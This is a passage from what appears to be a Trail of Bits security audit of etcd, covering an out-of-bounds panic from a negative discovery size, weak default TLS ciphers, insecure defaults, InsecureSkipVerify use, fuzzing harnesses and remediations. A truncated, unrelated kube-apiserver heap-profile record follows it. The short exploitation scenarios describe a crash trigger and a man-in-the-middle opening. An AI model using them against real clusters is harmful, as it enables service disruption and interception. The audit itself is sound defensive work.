\n/.../etcdserver/api/v2discovery/discovery.go:341 +0x1bf6\n \ngo.etcd.io/etcd/etcdserver/api/v2discovery.(*discovery).joinCluster(0xc0002\n946e0, 0xc0002cd040, 0x1d, 0x0, 0x0, 0x0, 0x0)\n \n/.../etcdserver/api/v2discovery/discovery.go:180 +0x2f6\n \ngo.etcd.io/etcd/etcdserver/api/v2discovery.JoinCluster(0x0, 0x7ffeefbff5de,\n \n0x54, 0x0, 0x0, 0x561d867318552b53, 0xc0002cd040, 0x1d, 0x0, 0x0, ...)\n \n/.../etcdserver/api/v2discovery/discovery.go:68 +0x16d\n \ngo.etcd.io/etcd/etcdserver.NewServer(0x20a4b58, 0x7, 0x7ffeefbff5de, 0x54,\n \n0x0, 0x0, 0xc0001cad80, 0x1, 0x1, 0xc0001caa80, ...)\n \n/.../etcdserver/server.go:389 +0x4148\n \ngo.etcd.io/etcd/embed.StartEtcd(0xc0001a5080, 0xc0001a5600, 0x0, 0x0)\n \n/.../embed/etcd.go:211 +0x1175\n \ngo.etcd.io/etcd/etcdmain.startEtcd(0xc0001a5080, 0x0, 0x0, 0x0, 0x0)\n \n/.../etcdmain/etcd.go:302 +0x7a\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 35\n \n go.etcd.io/etcd/etcdmain.startEtcdOrProxyV2()\n \n/.../etcdmain/etcd.go:160 +0x3411\n \ngo.etcd.io/etcd/etcdmain.Main()\n \n/.../etcdmain/main.go:46 +0x43b\n \nmain.main()\n \n/.../main.go:28 +0x20\n \nFigure TOB-ETCD-014.2: The traceback for the out-of-bounds index ​\npanic\n​\n.\n \n \nfunc\n​\n \n​\n(\n​\nd\n​\n *\n​\ndiscovery\n​\n) waitNodes\n​\n(\n​\nnodes\n​\n []*\n​\nclient\n​\n.\n​\nNode\n​\n, \n​\nsize\n​\n \n​\nint\n​\n, \n​\nindex\n​\n \n​\nuint64\n​\n) ([]*\n​\nclient\n​\n.\n​\nNode\n​\n,\n \nerror\n​\n) {\n \nif\n​\n \n​\nlen\n​\n(nodes) > size {\n \nnodes = nodes[:size]\n \n}\n \nFigure TOB-ETCD-014.3: The negative ​\nsize\n​\n is used to index this array, resulting in an index\n \nout-of-bounds ​\npanic\n​\n (​\netcdserver/api/v2discovery/discovery.go#L339-L342\n​\n)​\n.\n \n \nExploitation Scenario\n \nAn attacker identifies an etcd cluster and discovery URL used for service discovery, then\n \nsubstitutes the size value used to bootstrap with a ​\n-1\n​\n. As a result, all instances attempting\n \nto discover other instances with that URL panic.\n \n \nRecommendation\n \nShort term, ensure proper validation for all values retrieved and parsed from outside\n \nsources. This will help reduce the effect of a third-party system compromise on the\n \nintegrity of etcd.\n \n \nLong term, consider consolidating validation routines into a specific set of helper libraries\n \nused across the codebase. Avoid using ​\nstrconv.Atoi\n​\n without validating the parsed value.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 36\n \n 1 5 . I n s e c u r e c i p h e r s a r e a l l o w e d b y d e f a u l t\n \nSeverity: Low\nDifficulty: Undetermined\n \nType: Cryptography\nFinding ID: TOB-ETCD-015\n \nTarget: ​\npkg/tlsutil/cipher_suites.go\n \n \nDescription\n \nThe TLS ciphers list supported by etcd contains weak ciphers. This list, as the comment in\n \nFigure TOB-ETCD-015.1 notes, was taken from Go cipher suites which ​\ndisables some of the\n \nciphers by default​\n (marked with the ​\nsuiteDefaultOff\n​\n flag) but those ciphers are not\n \ndisabled by etcd. This allows for insecure connections to etcd by default, exposing its users\n \nto risk.\n \n \nThis issue has been reported to etcd as ​\nissue 10304​\n.\n \n \n// cipher suites implemented by Go\n \n \n// https://github.com/golang/go/blob/dev.boringcrypto.go1.10/src/crypto/tls/cipher_suites.go\n \n \nvar\n​\n cipherSuites = \n​\nmap\n​\n[\n​\nstring\n​\n]\n​\nuint16\n​\n{\n \n \n \n​\n\"TLS_RSA_WITH_RC4_128_SHA\"\n​\n: tls.TLS_RSA_WITH_RC4_128_SHA,\n \n \n \n​\n\"TLS_RSA_WITH_3DES_EDE_CBC_SHA\"\n​\n: tls.TLS_RSA_WITH_3DES_EDE_CBC_SHA,\n \n \n \n​\n\"TLS_RSA_WITH_AES_128_CBC_SHA\"\n​\n: tls.TLS_RSA_WITH_AES_128_CBC_SHA,\n \n \n \n​\n\"TLS_RSA_WITH_AES_256_CBC_SHA\"\n​\n: tls.TLS_RSA_WITH_AES_256_CBC_SHA,\n \n \n \n​\n\"TLS_RSA_WITH_AES_128_CBC_SHA256\"\n​\n: tls.TLS_RSA_WITH_AES_128_CBC_SHA256,\n \n \n \n​\n\"TLS_RSA_WITH_AES_128_GCM_SHA256\"\n​\n: tls.TLS_RSA_WITH_AES_128_GCM_SHA256,\n \n \n \n​\n\"TLS_RSA_WITH_AES_256_GCM_SHA384\"\n​\n: tls.TLS_RSA_WITH_AES_256_GCM_SHA384,\n \n \n \n​\n\"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA\"\n​\n: tls.TLS_ECDHE_ECDSA_WITH_RC4_128_SHA,\n \n \n \n​\n\"TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA\"\n​\n: tls.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA,\n \n \n \n​\n\"TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\"\n​\n: tls.TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_RC4_128_SHA\"\n​\n: tls.TLS_ECDHE_RSA_WITH_RC4_128_SHA,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA\"\n​\n: tls.TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\"\n​\n: tls.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\"\n​\n: tls.TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,\n \n \n \n​\n\"TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256\"\n​\n: tls.TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256\"\n​\n: tls.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\"\n​\n: tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,\n \n \n \n​\n\"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256\"\n​\n: tls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\"\n​\n: tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,\n \n \n \n​\n\"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384\"\n​\n: tls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,\n \n \n \n​\n\"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305\"\n​\n: tls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305,\n \n \n \n​\n\"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305\"\n​\n: tls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305,\n \n \n }\n \nFigure TOB-ETCD-015.1: Ciphers supported by etcd\n \n(​\npkg/tlsutil/cipher_suites.go#L19-L44\n​\n).\n \n \nRecommendation\n \nShort term, disable weak ciphers and require a special flag to enable them. By default, only\n \nenable the modern ciphers as recommended by the ​\nMozilla Security/Server side document​\n.\n \n \n \nLong term, determine the most popular ciphers used by etcd clients and consider removing\n \nweak ciphers from support. This will help prevent clients from accidentally configuring an\n \ninsecure cipher when using etcd.\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 37\n \n 1 6 . e t c d i s i n s e c u r e b y d e f a u l t\n \nSeverity: Informational\nDifficulty: Undetermined\n \nType: Cryptography\nFinding ID: TOB-ETCD-016\n \nTarget: ​\netcd configuration\n \n \nDescription\n \nWhen etcd is started without a specific configuration, it:\n \n \n●\nServes traffic from unencrypted endpoint (​\nhttp://127.0.0.1:2379/​\n),\n \n●\nUses simple tokens instead of cryptographically signed ones,\n \n●\nAllows for unauthenticated client access, and\n \n●\nDoesn’t use TLS for peer-to-peer connections.\n \n \nAlthough logs are produced when starting etcd under the first two conditions (Figure\n \nTOB-ETCD-016.1), an inexperienced user might gain a false notion of the security of etcd\n \ndefaults and become prone to further configuring etcd insecurely.\n \n \nauth: simple token is not cryptographically signed\n \nembed: serving insecure client requests on 127.0.0.1:2379, this is strongly discouraged!\n \nFigure TOB-ETCD-016.1: Warnings present when launching etcd with no configuration flags.\n \n \nThis issue has been reported to etcd as ​\nissue 9475​\n.\n \n \nRecommendation\n \nShort term, deprecate the insecure defaults and promote more secure usage of etcd. For\n \nexample, list all insecure options at once during startup: describe the problems, suggest\n \nfixes, and link to a documentation page that would show how to set up etcd securely.\n \n \nLong term, make etcd secure by default, by requiring a minimally secure launch\n \nconfiguration. To ease development, testing, and debugging, consider providing a simpler\n \nbut less secure configuration under ​\n--insecure\n​\n.\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 38\n \n 1 7 . U s e o f T L S I n s e c u r e S k i p V e r i f y\n \nSeverity: Informational\nDifficulty: Undetermined\n \nType: Cryptography\nFinding ID: TOB-ETCD-017\n \nTarget: ​\nTLS Configuration\n \n \nDescription\n \nTransport Layer Security (TLS) appears in multiple locations throughout the etcd codebase,\n \nsometimes including ​\nInsecureSkipVerify\n​\n to disable certificate checks. The lack of\n \nauthentication in some configurations presents opportunities for Monkey-In-The-Middle\n \ninterference.\n \n \n// If the user wants to skip TLS verification then we should set\n \n// the InsecureSkipVerify flag in tls configuration.\n \nif\n​\n scfg.insecureSkipVerify && cfg.TLS != \n​\nnil\n​\n {\n \n cfg.TLS.InsecureSkipVerify = \n​\ntrue\n \n}\n \nFigure TOB-ETCD-017.1: Use of ​\nInsecureSkipVerify\n \n(​\netcdctl/ctlv3/command/global.go#L234-L238\n​\n).\n \n \n \nExploitation Scenario\n \nTLSInsecureSkipVerify\n​\n is enabled, allowing an attacker to perform Monkey-In-The-Middle\n \noperations without the complications of TLS verification.\n \n \nRecommendation\n \nShort term, review configurations that use ​\nInsecureSkipVerify\n​\n. Use insecure TLS\n \nselectively and with caution. There are few purposes for which unverified certificates\n \nshould be supported.\n \n \nLong term, avoid use of insecure TLS configurations altogether. Verify certificates in all\n \nscenarios by default.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 39\n \n A . V u l n e r a b i l i t y C l a s s i f i c a t i o n s\n \nVulnerability Classes\n \nClass\n \nDescription\n \nAccess Controls\n \nRelated to authorization of users and assessment of rights\n \nAuditing and Logging\n \nRelated to auditing of actions or logging of problems\n \nAuthentication\n \nRelated to the identification of users\n \nConfiguration\n \nRelated to security configurations of servers, devices or software\n \nCryptography\n \nRelated to protecting the privacy or integrity of data\n \nData Exposure\n \nRelated to unintended exposure of sensitive information\n \nData Validation\n \nRelated to improper reliance on the structure or values of data\n \nDenial of Service\n \nRelated to causing system failure\n \nError Reporting\n \nRelated to the reporting of error conditions in a secure fashion\n \nPatching\n \nRelated to keeping software up to date\n \nSession Management\n \nRelated to the identification of authenticated users\n \nTiming\n \nRelated to race conditions, locking or order of operations\n \nUndefined Behavior\n \nRelated to undefined behavior triggered by the program\n \n \n \nSeverity Categories\n \nSeverity\n \nDescription\n \nInformational\n \nThe issue does not pose an immediate risk, but is relevant to security\n \nbest practices or Defense in Depth\n \nUndetermined\n \nThe extent of the risk was not determined during this engagement\n \nLow\n \nThe risk is relatively small or is not a risk the customer has indicated is\n \nimportant\n \nMedium\n \nIndividual user’s information is at risk, exploitation would be bad for\n \nclient’s reputation, moderate financial impact, possible legal\n \nimplications for client\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 40\n \n High\n \nLarge numbers of users, very bad for client’s reputation, or serious\n \nlegal or financial implications\n \n \nDifficulty Levels\n \nDifficulty\n \nDescription\n \nUndetermined\n \nThe difficulty of exploit was not determined during this engagement\n \nLow\n \nCommonly exploited, public tools exist or can be scripted that exploit\n \nthis flaw\n \nMedium\n \nAttackers must write an exploit, or need an in-depth knowledge of a\n \ncomplex system\n \nHigh\n \nThe attacker must have privileged insider access to the system, may\n \nneed to know extremely complex technical details or must discover\n \nother weaknesses in order to exploit this issue\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 41\n \n B . C o d e Q u a l i t y R e c o m m e n d a t i o n s\n \nThis appendix details etcd issues that could be improved, but do not impact the project’s\n \nsecurity posture. These recommendations are proposed to prevent future errors from\n \noccurring, and to improve the quality of future code contributions.\n \n \netcdctl/ctlv2/command/exec_watch_command.go#L81-L94\n \nThe ​\nafter-index\n​\n configuration variable is fetched as an integer and is then casted to\n \nuint64\n​\n. We recommend fetching it as ​\nUint64\n​\n.\n \n \nindex = c.\n​\nInt\n​\n(\n​\n\"after-index\"\n​\n)\n \n// (...)\n \nw \n​\n:=\n​\n ki.\n​\nWatcher\n​\n(key, &client.WatcherOptions{AfterIndex: \n​\nuint64\n​\n(index), \n​\nRecursive\n​\n:\n \nrecursive})\n \n \nclientv3/balancer/connectivity/connectivity.go#L71-L72\n \nThe ​\nupdateVal\n​\n in the loop shown below will have a value of ​\nmath.MaxUint64\n​\n in its first\n \niteration due to the ​\n2*uint64(0) - 1\n​\n calculation (which is ​\n18446744073709551615\n​\n). While\n \nthis is not a bug, we recommend changing the code so it won’t overflow, making it less\n \nconfusing for readers.\n \n \nfor\n​\n idx, state \n​\n:=\n​\n \n​\nrange\n​\n []connectivity.State{oldState, newState} {\n \n \n \nupdateVal \n​\n:=\n​\n \n​\n2\n​\n*\n​\nuint64\n​\n(idx) - \n​\n1\n​\n \n​\n// -1 for oldState and +1 for new.\n \n \nauth/simple_token.go#L223-L229\n \nThere are places in the codebase where a result of ​\nstrconv.Atoi\n​\n integer parsing is casted\n \nto ​\nuint64\n​\n. One of the examples is ​\nauth/simple_token.go#L218-L235\n​\n shown below. Those\n \ncases should use ​\nstrconv.ParseUint\n​\n instead to prevent accepting negative integers as\n \nvalid inputs.\n \n \n \nindex, err \n​\n:=\n​\n strconv.\n​\nAtoi\n​\n(splitted[\n​\n1\n​\n])\n \n \nif\n​\n err != \n​\nnil\n​\n {\n \n \n \nreturn\n​\n \n​\nfalse\n \n \n}\n \n \n \n \nselect\n​\n {\n \n \ncase\n​\n \n​\n<-\n​\nt.\n​\nindexWaiter\n​\n(\n​\nuint64\n​\n(index)):\n \n \netcdserver/api/rafthttp/http.go#L221-L222\n \nThe RAFT's ​\nsnapshotHandler\n​\n's ​\nServeHTTP\n​\n function sets a very large ​\ndecodeLimit\n​\n by using a\n \nuint64(1 << 63)\n​\n expression. We recommend using either 1) a proper limit, or 2) the\n \nmath.MaxUint64\n​\n constant (if the purpose is to set no limit).\n \n \n// let snapshots be very large since they can exceed 512MB for large installations\n \n \n m, err \n​\n:=\n​\n dec.\n​\ndecodeLimit\n​\n(\n​\nuint64\n​\n(\n​\n1\n​\n << \n​\n63\n​\n))\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 42\n \n embed/config.go#L136-L140​\n and ​\nembed/config.go#L594-L599\n \nThe ​\ncfg.TickMs\n​\n and ​\ncfg.ElectionMs\n​\n are of unsigned integer types, but they are checked\n \nfor being less than zero. The comparisons below should be changed to check only for their\n \nvalue being “equal to zero.”\n \n \n// TickMs is the number of milliseconds between heartbeat ticks.\n \n \n// TODO: decouple tickMs and heartbeat tick (current heartbeat tick = 1).\n \n \n// make ticks a cluster wide configuration.\n \n \nTickMs\n​\n \n​\nuint\n​\n \n​\n`json:\"heartbeat-interval\"`\n \n \nElectionMs\n​\n \n​\nuint\n​\n \n​\n`json:\"election-timeout\"`\n \n \n \n// Below are lines 594-599\n \nif\n​\n cfg.TickMs <= \n​\n0\n​\n {\n \n \n \nreturn\n​\n fmt.\n​\nErrorf\n​\n(\n​\n\"--heartbeat-interval must be >0 (set to \n​\n%d\n​\nms)\"\n​\n, cfg.TickMs)\n \n \n }\n \n \nif\n​\n cfg.ElectionMs <= \n​\n0\n​\n {\n \n \n \nreturn\n​\n fmt.\n​\nErrorf\n​\n(\n​\n\"--election-timeout must be >0 (set to \n​\n%d\n​\nms)\"\n​\n, cfg.ElectionMs)\n \n \n}\n \n \n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 43\n \n C . F u z z i n g r e s u l t s\n \nTrail of Bits performed fuzz testing of the etcd WAL package using both ​\ngoogle/gofuzz\n​\n and\n \ndvyukov/go-fuzz\n​\n. Several potential issues were identified in the etcd WAL package,\n \nranging from a decoder panic (​\nTOB​\n-​\nETCD-007​\n) to a null pointer exception in a WAL struct\n \n(​\nTOB-ETCD-013​\n).\n \n \ne t c d w a l p a c k a g e\n \n \nTo test the WAL package, a corpus of valid WAL files were randomly generated with a script\n \nthat uses ​\ngoogle/gofuzz\n​\n ​\n(\n​\nsee Figure C.3). This corpus was then used with\n \ndvyukov/go-fuzz\n​\n to perform instrumented coverage-guided fuzzing. The results show the\n \npresence of potential edge-cases when the WAL decoder utilizes the size information it\n \nparses (​\nTOB-ETCD-007​\n) and a null pointer exception (​\nTOB-ETCD-013​\n).\n \n \nfunc\n​\n \n​\nCovFuzz\n​\n(\n​\ndata\n​\n []\n​\nbyte\n​\n) \n​\nint\n​\n{\n \n err \n​\n:=\n​\n ioutil.\n​\nWriteFile\n​\n(testPath, data, \n​\n0777\n​\n)\n \n \n​\ndefer\n​\n os.\n​\nRemove\n​\n(testPath)\n \n \n​\nif\n​\n err != \n​\nnil\n​\n {\n \n plog.\n​\nErrorf\n​\n(\n​\n\"could not write test file because: \n​\n%v\n​\n\"\n​\n, err)\n \n \n​\nreturn\n​\n \n​\n0\n \n }\n \n \n \n​\nvar\n​\n err \n​\nerror\n \n \n​\nvar\n​\n w *WAL\n \n \n​\nif\n​\n w, err = \n​\nOpen\n​\n(zap.\n​\nNewExample\n​\n(), kPathToCrash , walpb.Snapshot{}); err != \n​\nnil\n​\n {\n \n plog.\n​\nError\n​\n(err)\n \n \n​\nreturn\n​\n \n​\n0\n \n }\n \n metadata, _, _, err \n​\n:=\n​\n w.\n​\nReadAll\n​\n()\n \n \n​\nif\n​\n err != \n​\nnil\n​\n {\n \n plog.\n​\nFatalf\n​\n(\n​\n\"could not read file meta data and collect entries\"\n​\n)\n \n \n​\nreturn\n​\n \n​\n1\n \n }\n \n \n​\nif\n​\n !bytes.\n​\nEqual\n​\n(metadata, []\n​\nbyte\n​\n(metadataStr)) {\n \n plog.\n​\nFatalf\n​\n(\n​\n\"metadata = \n​\n%s\n​\n, want \n​\n%s\n​\n\"\n​\n, metadata, metadataStr)\n \n \n​\nreturn\n​\n \n​\n1\n \n }\n \n \n​\nreturn\n​\n \n​\n0\n \n}\n \nFigure C.1: Fuzzing test harness used with auto-generated corpus. The fuzzing was performed\n \nwith a single worker because the harness writes to and deletes a file.\n \n \nFurthermore, many unit tests were translated to fuzz tests with ​\ngoogle/gofuzz\n​\n to provide\n \nan adequate amount of API coverage. The result of translating unit-tests produced a\n \nruntime panic in the ​\nwal.ReadAll\n​\n function, detailed in ​\nTOB-ETCD-006​\n. During fuzzing, the\n \ncomplex structure of snapshots, records, hardstates, and entries were taken into account.\n \n \nfunc\n​\n \n​\nFuzzWriteRecord\n​\n() {\n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 44\n \n  b \n​\n:=\n​\n &walpb.Record{}\n \n encd \n​\n:=\n​\n walpb.Record{}\n \n buf \n​\n:=\n​\n \n​\nnew\n​\n(bytes.Buffer)\n \n e \n​\n:=\n​\n \n​\nnewEncoder\n​\n(buf, \n​\n0\n​\n, \n​\n0\n​\n)\n \n complexfuzzer.\n​\nFuzz\n​\n(&encd)\n \n e.\n​\nencode\n​\n(&encd)\n \n e.\n​\nflush\n​\n()\n \n decoder \n​\n:=\n​\n \n​\nnewDecoder\n​\n(ioutil.\n​\nNopCloser\n​\n(buf))\n \n err \n​\n:=\n​\n decoder.\n​\ndecode\n​\n(b)\n \n \n​\nif\n​\n err != \n​\nnil\n​\n {\n \n plog.\n​\nErrorf\n​\n(\n​\n\"err = \n​\n%v\n​\n, want nil\"\n​\n, err)\n \n }\n \n \n​\nif\n​\n b.Type != encd.Type {\n \n plog.\n​\nErrorf\n​\n(\n​\n\"type = \n​\n%d\n​\n, want \n​\n%d\n​\n\"\n​\n, b.Type, encd.Type)\n \n }\n \n \n​\nif\n​\n !reflect.\n​\nDeepEqual\n​\n(b.Data, encd.Data) {\n \n plog.\n​\nErrorf\n​\n(\n​\n\"data = \n​\n%v\n​\n, want \n​\n%v\n​\n\"\n​\n, b.Data, encd.Data)\n \n }\n \n}\n \nFigure C.2: Example of unit-test converted to fuzz test. ​\nTestWriteRecord\n​\n is converted to\n \nFuzzWriteRecord\n​\n.\n \n \nFuzzing triggered panics in the ​\nMustUnmarshal\n​\n function in both fuzzing approaches, but\n \nthis was not reported as a finding because it is intended behavior.\n \n \nfunc\n​\n \n​\nGenEntries\n​\n(\n​\nw\n​\n *\n​\nWAL\n​\n, \n​\nsize\n​\n \n​\nint\n​\n) {\n \n state \n​\n:=\n​\n raftpb.HardState{}\n \n \n​\nif\n​\n size < \n​\n0\n​\n {\n \n size *= -\n​\n1\n \n }\n \n plog.\n​\nInfo\n​\n(size)\n \n entries \n​\n:=\n​\n \n​\nmake\n​\n([]raftpb.Entry, size)\n \n \n​\nfor\n​\n i\n​\n:=\n​\n0\n​\n; i<size; i++ {\n \n complexfuzzer.\n​\nFuzz\n​\n(&entries[i])\n \n entries[i].Index = \n​\nuint64\n​\n(i)\n \n }\n \n state.Commit = \n​\nuint64\n​\n(size-\n​\n1\n​\n)\n \n \n​\nif\n​\n err \n​\n:=\n​\n w.\n​\nSave\n​\n(state, entries); err != \n​\nnil\n​\n {\n \n plog.\n​\nFatal\n​\n(err)\n \n }\n \n \n}\n \n \n \nfunc\n​\n \n​\nGenCorpus\n​\n() {\n \n path, err \n​\n:=\n​\n ioutil.\n​\nTempDir\n​\n(os.\n​\nTempDir\n​\n(), \n​\n\"corpus\"\n​\n)\n \n \n​\nif\n​\n err != \n​\nnil\n​\n {\n \n plog.\n​\nFatal\n​\n(err)\n \n }\n \n \n w, err \n​\n:=\n​\n \n​\nCreate\n​\n(zap.\n​\nNewExample\n​\n(), path, []\n​\nbyte\n​\n(metadataStr))\n \n \n​\nif\n​\n err != \n​\nnil\n​\n {\n \n plog.\n​\nFatal\n​\n(err)\n \n \n }\n \n \n​\ndefer\n​\n w.\n​\nClose\n​\n()\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 45\n \n  \n​\nvar\n​\n size \n​\nint\n \n \n​\nfor\n​\n i\n​\n:=\n​\n0\n​\n; i<numTests; i++{\n \n fuzzer.\n​\nFuzz\n​\n(&size)\n \n size %= numTests\n \n \n​\nGenEntries\n​\n(w, size + \n​\n2\n​\n)\n \n err = \n​\nVerify\n​\n(zap.\n​\nNewExample\n​\n(), path, walpb.Snapshot{})\n \n \n​\nif\n​\n err != \n​\nnil\n​\n {\n \n plog.\n​\nErrorf\n​\n(\n​\n\"expected a nil error, got \n​\n%v\n​\n\"\n​\n, err)\n \n \n​\ncontinue\n \n }\n \n w.\n​\ncut\n​\n()\n \n }\n \n}\n \nFigure C.3: Script used to generate WAL corpus.\n \n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 46\n \n D . G a t e w a y F i n d i n g R e m e d i a t i o n s\n \nAfter discussions with the Etcd team, we determined that remediating several gateway\n \nfindings required either documentation improvements or future deprecation. Here are the\n \nspecific remediations we discussed with the Etcd team:\n \n \n●\nTOB-ETCD-001: Gateway TLS endpoint validation only confirms TCP reachability\n \n \nIt appears that the function ​\nValidateSecureEndpoints\n​\n is misleading in name and\n \nintent. We believe appropriate documentation of this functionality plus deprecation\n \nof this misleading functionality is an acceptable path forward. During our\n \ndiscussions, the Etcd team noted that if the community wants endpoint TLS\n \nvalidation functionality, it would not be added to the gateway, but instead to a\n \nseparate utility to avoid backwards incompatibility and reduce confusion.\n \n \n●\nTOB-ETCD-004: Gateway TLS authentication only applies to endpoints detected in\n \nDNS SRV records\n \n \nThis finding is an extension of ​\nTOB-ETCD-001: Gateway TLS endpoint validation only\n \nconfirms TCP reachability​\n, as the validation only applies to endpoints identified in\n \nDNS SRV records, not the endpoints provided through command line flags. As a\n \nresult, there is an inconsistent application of validation.\n \n \nWe believe that because of the aforementioned misleading name and intent of the\n \nValidateSecureEndpoints\n​\n function, this lack of validation does not present\n \nsignificant concern, outside the lack of a TCP reachability check. Appropriate\n \ndocumentation of the selective application of ​\nValidateSecureEndpoints\n​\n should be\n \nsufficient to prevent users from believing the same validation is performed on\n \nvalues provided through command line flags.\n \n \n●\nTOB-ETCD-005: TOCTOU of gateway endpoint authentication\n \n \nAs mentioned in ​\nTOB-ETCD-004: Gateway TLS authentication only applies to\n \nendpoints detected in DNS SRV records​\n, ​\nValidateSecureEndpoints\n​\n is only applied\n \nto endpoints discovered through DNS SRV records. However, this validation only\n \napplies on boot, and is not checked again before the gateway routes connections to\n \nan endpoint.\n \n \nAfter our discussions with the Etcd team, we believe that appropriate\n \ndocumentation of this functionality will adequately prevent users from being misled\n \nas to the endpoint validation semantics.\n \n \n \n© 2020 Trail of Bits\n \n Linux Foundation Etcd Assessment | 47\n \n " } ]
{ "category": "Orchestration & Management", "file_name": "kube-apiserver-heap-profile-5000-props.pdf", "project_name": "Crossplane", "subcategory": "Scheduling & Orchestration" }
[ { "data": "File: kube-apiserver\nType: inuse_space\nTime: Feb 24, 2022 at 12:49am (+03)\nShowing nodes accounting for 4593.46MB, 91.90% of 4998.29MB total\nDropped 877 nodes (cum <= 24.99MB)\nDropped 12 edges (freq <= 5MB)\nShowing top 54 nodes out of 132\nSee https://git.io/JfYMW for how to read the graphv1beta1\nautoConvert_v1beta1_JSONSchemaProps_To_apiextensions_JSONSchemaProps\n684.51MB (13.69%)\n512B 620.30MB\n224kB 53.71MBv1\n(*JSONSchemaProps)\nUnmarshal\n799.01MB (15.99%)\n512B 686.34MB\n224kB 66.67MB\nreflect\nmapassign\n685.43MB (13.71%)\n576B 617.34MB\n224kB 52.47MBjson\n(*decodeState)\nobject\n0.50MB (0.01%)\nof 795.92MB (15.92%)\njson\n(*decodeState)\nvalue\n0 of 795.92MB (15.92%) 795.92MB\njson\n(*decodeState)\nobjectInterface\n283.47MB (5.67%)\nof 323.48MB (6.47%) 22.57MB\njson\nUnmarshal\n1.50MB (0.03%)\nof 793.84MB (15.88%) 793.34MBreflect\nValue\nSetMapIndex\n0 of 685.43MB (13.71%) 677.81MB\nreflect\nValue\nConvert\n0 of 52MB (1.04%) 23MB\nschema\n(*Structural)\nToKubeOpenAPI\n568.83MB (11.38%)\nof 578.83MB (11.58%)\n576B 525.29MB\n224kB 37.04MB\nvalidation\nconvertMapOfJSONSchemaProps\n554.82MB (11.10%)\nof 567.82MB (11.36%)\n576B 510.78MB\n224kB 37.04MBvalidation\nConvertJSONSchemaPropsWithPostProcess\n13MB (0.26%)\nof 567.82MB (11.36%)\n 566.32MB 795.92MB\njson\n(*decodeState)\nliteralStore\n16MB (0.32%)\nof 35.01MB (0.7%) 35.01MB\nschema\n(*Structural)\nDeepCopyInto\n420.82MB (8.42%)\n256B 216.05MB\n176B 158.53MB\n224kB 40.74MBschema\n(*Structural)\nDeepCopy\n0 of 420.82MB (8.42%)\n 420.82MB\n (inline)http\nHandlerFunc\nServeHTTP\n0 of 240.74MB (4.82%)\nserver\ndirector\nServeHTTP\n0 of 317.09MB (6.34%) 228.56MB\npprof\nwriteHeapInternal\n18.69MB (0.37%)\nof 55.50MB (1.11%) 55.50MB\nfilters\nWithPriorityAndFairness\nfunc1\n0 of 69.81MB (1.40%) 67.31MB\nhandler\n(*OpenAPIService)\nRegisterOpenAPIVersionedService\nfunc1\n0 of 128.48MB (2.57%) 128.48MB\n288B 173.55MB\n296kB 42.79MB\n48B 28.50MB\njson\nunquote\n25MB (0.5%)\nof 28.50MB (0.57%) 19.50MB\n (inline)\njson\n(*decodeState)\nvalueInterface\n0 of 319.47MB (6.39%) 319.47MBmux\n(*pathHandler)\nServeHTTP\n0 of 322.77MB (6.46%)\n 187.14MB\napiserver\n(*crdHandler)\ngetOrCreateServingInfoFor\n0.50MB (0.01%)\nof 128.30MB (2.57%) 127.30MB\n 316.59MB\njson\nMarshal\n48.78MB (0.98%)\nof 129.61MB (2.59%)\n42.55MB 42.55MB\njson\n(*encodeState)\nreflectValue\n0 of 80.83MB (1.62%) 80.83MBzapcore\nnewCounters\n115.54MB (2.31%)\n448kB 115.54MB 793.84MB\nbytes\nmakeSlice\n83.60MB (1.67%)\n71.26MB 71.26MBjson\nmarshalerEncoder\n0 of 80.33MB (1.61%) 80.33MB\n 80.33MBschemaconv\n(*convert)\nVisitKind\n68.94MB (1.38%)\nof 103.94MB (2.08%)\n280kB 51.93MB\n128B 5MB\nproto\n(*Kind)\nAccept\n0 of 103.94MB (2.08%) 96.94MB\n 567.82MBwait\nBackoffUntil\nfunc1\n0 of 102.78MB (2.06%)\naggregator\n(*Downloader)\nDownload\n0 of 51.06MB (1.02%) 45.06MB\nbuilder\nBuildOpenAPIV2\n0 of 43.54MB 